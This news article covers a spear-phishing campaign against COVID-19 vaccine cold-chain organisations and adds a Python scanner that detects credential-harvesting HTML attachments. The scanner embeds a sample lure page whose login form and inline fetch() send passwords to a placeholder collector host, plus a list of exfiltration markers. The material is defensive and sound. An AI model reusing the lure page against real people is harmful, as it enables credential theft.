A new global phishing attack is focused on disrupting supply chains designed to keep COVID-19 vaccine components cold.
On Thursday, researchers from the IBM Security X-Force team said that organizations connected to COVID-19 cold chains — part of the supply chain ensuring potential vaccines are stored and preserved safely at the right temperature — are being targeted by threat actors.
Scientists across the globe have worked at a furious pace over 2020 to develop safe and effective vaccines for the novel coronavirus. Funding has been poured into these projects from the outset, producing unusually rapid transitions from development to clinical trials, and the UK has become the first country to authorize one, developed by Pfizer and BioNTech, for public use.
Because some vaccines, including the Pfizer/BioNTech product, must be kept at roughly -70°C to preserve their efficacy, sustaining and protecting the cold storage components of the supply chain is critical.
According to IBM threat researchers Melissa Frydrych and Claire Zaboeva, this is precisely the area the new attack wave is aimed at.
The operation began in September this year. Organizations believed to be associated with the Cold Chain Equipment Optimization Platform (CCEOP) program of Gavi, the Vaccine Alliance, which was launched in 2015 to strengthen vaccine supply chains, have been targeted across six countries.
The CCEOP is a key element in many vaccine transport and distribution initiatives, and so it may not come as a surprise that one of its main partner executives was the target chosen for impersonation.
IBM says that a business executive from Haier Biomedical, a Chinese member company and CCEOP supplier that claims to be the world’s only “complete cold chain provider,” was imitated by the group.
Spear-phishing emails were sent under this assumed identity to targets including the European Commission's Directorate-General for Taxation and Customs Union, as well as organizations in the energy, manufacturing, finance, and IT sectors in Europe and Taiwan.
The companies contacted appear to have been selected as potential suppliers of resources required by the COVID-19 vaccine cold chain. The phishing emails, apparently sent by the executive, request service quotes in relation to CCEOP vaccine projects. However, they carry malicious HTML attachments which, when opened locally in the recipient's browser, present a login prompt and ask for credentials before purporting to display the requested content. Because the page is loaded from the local file system rather than fetched from a phishing site, there is no hosted URL for web filters or URL-reputation services to block, which is a large part of the technique's appeal.
It is suspected that the scheme is focused on credential harvesting and is an attempt to secure unauthorized access to corporate networks and resources for future use — as well as to exfiltrate any information concerning future vaccine distribution plans.
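An HTML attachment of the kind described above has a recognizable shape: a form containing a password field whose contents are sent to a host the sender has no business using, sometimes via inline script rather than a form action. The scanner below is an added example, not code from IBM X-Force or from this article, and the attachment text it examines is constructed for illustration (the collector host uses the reserved `.invalid` domain; it is not an indicator from the real campaign). It parses the attachment with the standard-library HTML parser, reports every form that asks for a password together with the host it posts to, and flags inline script that performs its own network submission.

```python
"""Scan an HTML e-mail attachment for credential-harvesting forms.

Added example. SAMPLE_ATTACHMENT is constructed for illustration and is
not a file from the campaign described in the article.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed lure: a "request for quotation" page gated behind a login form
# that posts to a third-party host and also submits via inline script.
SAMPLE_ATTACHMENT = """<html><body>
<h3>Request for Quotation - cold chain equipment</h3>
<p>Please sign in with your corporate e-mail to view the attached RFQ.</p>
<form id="login" method="post" action="https://example-collector.invalid/post.php">
  <input type="email" name="username" placeholder="Corporate e-mail">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" value="View document">
</form>
<script>
  document.getElementById("login").onsubmit = function () {
    fetch("https://example-collector.invalid/post.php", {method: "POST"});
  };
</script>
</body></html>"""

# Substrings in inline script that indicate the page submits data itself.
SCRIPT_EXFIL_MARKERS = ("fetch(", "XMLHttpRequest", "navigator.sendBeacon")


class _FormScanner(HTMLParser):
    """Collects each <form> (action + inputs) and all inline script text."""

    def __init__(self):
        super().__init__()
        self.forms = []         # finished forms
        self.script_text = ""   # concatenated contents of <script> blocks
        self._current = None    # form currently being built
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data


def credential_forms(html, trusted_hosts=()):
    """Return a list of findings, one per form that asks for a password.

    A form is marked suspicious when its action is relative/empty (a local
    file has nowhere legitimate to post to, so submission is script-driven)
    or when it targets a host outside trusted_hosts.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        types = [t for t, _ in form["inputs"]]
        if "password" not in types:
            continue
        host = urlparse(form["action"]).hostname or ""
        findings.append({
            "action": form["action"],
            "host": host,
            "fields": [n for _, n in form["inputs"] if n],
            "suspicious": host == "" or host not in trusted_hosts,
        })
    return findings


def script_exfiltrates(html):
    """True if inline script contains a network-submission primitive."""
    scanner = _FormScanner()
    scanner.feed(html)
    return any(m in scanner.script_text for m in SCRIPT_EXFIL_MARKERS)


if __name__ == "__main__":
    for f in credential_forms(SAMPLE_ATTACHMENT, trusted_hosts=("login.example.com",)):
        print(f)
    print("inline script exfiltration:", script_exfiltrates(SAMPLE_ATTACHMENT))
```

In a mail gateway or sandbox this check would run on every `.html`/`.htm` attachment and on HTML bodies saved to disk; the trusted-host list is the organization's own identity provider, so any password form pointing elsewhere, or nowhere, is worth quarantining before a user opens it. It is deliberately a structural check rather than an indicator match, since the collector hostname changes from campaign to campaign while the form shape does not.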
At this stage, IBM is unable to firmly attribute the phishing campaign to a particular threat group. However, “the precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft,” the company says.
“Without a clear path to a cash-out, cybercriminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets,” IBM added. “Likewise, insight into the transport of a vaccine may present a hot black-market commodity, however, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely a high-value and high-priority nation-state target.”
The organizations targeted in this global campaign have been notified. In addition, DHS CISA is due to issue an alert urging cold chain companies to review their cybersecurity posture in light of the new phishing scheme.